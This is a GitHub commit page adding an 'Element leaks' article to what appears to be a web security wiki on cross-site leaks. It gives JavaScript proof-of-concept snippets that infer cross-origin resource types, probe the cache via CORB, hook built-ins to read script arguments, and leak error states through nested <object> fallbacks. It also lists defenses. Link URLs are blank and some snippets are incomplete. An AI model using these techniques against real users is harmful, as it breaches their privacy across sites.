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Element leaks (#109)
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NDevTK committed Jun 11, 2021
1 parent e91ecb7 commit ef18208
Showing 1 changed file with 128 additions and 0 deletions.
128 changes: 128 additions & 0 deletions content/docs/attacks/
@@ -0,0 +1,128 @@
title = "Element leaks"
description = ""
category = "Attack"
abuse = [
defenses = [
"SameSite Cookies"
menu = "main"
weight = 2

Some HTML Elements might be used to leak a portion of data to a cross-origin page.
For example, the below media resources can leak information about its size, duration, type.

- [HTMLMediaElement]( leaks the media `duration` and the `buffered` times.
- [HTMLVideoElement]( leaks the `videoHeight` and `videoWidth`
some browsers may also have `webkitVideoDecodedByteCount`, `webkitAudioDecodedByteCount` and `webkitDecodedFrameCount`
- [getVideoPlaybackQuality()]( leaks the `totalVideoFrames`.
- [HTMLImageElement]( leaks the `height` and `width` but if the image is invalid they will be 0
and [`image.decode()`]( will get rejected.

It's possible to differentiate between media types via unique property for a given media type. For example, it is `videoWidth` for a `<video>`, or `duration` for an `<audio>`. The below snippet shows an example code that returns the type of a resource.
async function getType(url) {
// Detect if resource is audio or video
let media = document.createElement("video");
media.src = url;
await new Promise(r=>setTimeout(r,50));
if (media.videoWidth) {
return "video";
} else if (media.duration) {
return "audio"
// Detect if resource is an image
let image = new Image();
image.src = url;
await new Promise(r=>setTimeout(r,50));
if (image.width) return "image";

## Abusing CORB
[CORB]({{< ref "/docs/attacks/browser-features/" >}}) is a feature of Chrome that makes responses empty if the wrong content type is used.
This means that if the type is wrong it’s not cached.
An `ifCached` function can be found in [Cache Probing]({{< ref "/docs/attacks/" >}}) article.
async function isType(url, type = "script") {
let error = false;
// Purge url
await ifCached(url, true);
// Attempt to load resource
let e = document.createElement(type);
e.onerror = () => error = true;
e.src = url;
// Wait for it to be cached if its allowed by CORB
await new Promise(resolve => setTimeout(resolve, 500));
// Cleanup
// Fix for "images" that get blocked differently.
if (error) return false
return ifCached(url);

## Abusing getComputedStyle
[getComputedStyle]( can be used to read an embedded to the current page CSS style sheets. Including those loaded from different origins.
This function just checks if there has been a style applied to the body.
async function isCSS(url) {
let link = document.createElement('link');
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = url;
let style1 = JSON.stringify(getComputedStyle(document.body));
await new Promise(resolve => setTimeout(resolve, 500));
let style2 = JSON.stringify(getComputedStyle(document.body));
return (style1 !== style2);
## PDF
There are [Open URL Parameters]( that allow some control over the content such as `zoom`, `view`, `page`, `toolbar`.
For chrome, a PDF can be detected with [frame counting]({{< ref "/docs/attacks/" >}}) because an `embed` is used internally.
async function isPDF(url) {
let w = open(url);
await new Promise(resolve => setTimeout(resolve, 500));
let result = (w.length === 1);
return result;
{{< hint warning >}} There will be false positives if the page has other embeds. {{< /hint >}}

## Script tag
When a cross-origin script is included on a page it's not directly possible to read its contents. However, if a script uses any built-in functions, it's possible to overwrite them and read their arguments which might leak valuable information [^script-leaks].
let hook = window.Array.prototype.push;
window.Array.prototype.push = function() {
return hook.apply(this, arguments);

## When Javascript can’t be used
If JavaScript is disabled it's still possible to leak some information about cross-origin resources. For example, an `<object>` can be used to detect whether a resource responds with *Error Code*. What happens is that if a resource `//` returns an error in `<object data=//>fallback</object>` then `fallback` will be rendered [^fallback] [^leaky-images]. It's possible to inject another `<object>` inside that will leak the information to an outside server, or detect it with CSS [^xsleaks-nojs].
The below code embeds `//` and if it responds with *Error* then a request to `//` is also made as a fallback.
<object data="//">
<object data="//"></object>

## Defense

| Attack Alternative | [SameSite Cookies (Lax)]({{< ref "/docs/defenses/opt-in/" >}}) | [COOP]({{< ref "/docs/defenses/opt-in/" >}}) | [Framing Protections]({{< ref "/docs/defenses/opt-in/" >}}) | [Isolation Policies]({{< ref "/docs/defenses/isolation-policies" >}}) |
| :----------------: | :--------------------------------------------------------------------------------: | :-------------------------------------------------: | :---------------------------------------------------------------: | :------------------------------------------------------------------------------------------------------------------------------------------------------: |
| Type leaks | ✔️ | ❌ | ❌ | [RIP]({{< ref "/docs/defenses/isolation-policies/resource-isolation" >}}) 🔗 [NIP]({{< ref "/docs/defenses/isolation-policies/navigation-isolation" >}}) |
## References
[^script-leaks]: The Unexpected Dangers of Dynamic JavaScript. [link](
[^fallback]: HTML Standard, [ Embedded content], [link](
[^leaky-images]: Leaky Images: Targeted Privacy Attacks in the Web, [3.4 Linking User Identities], [link](
[^xsleaks-nojs]: [](

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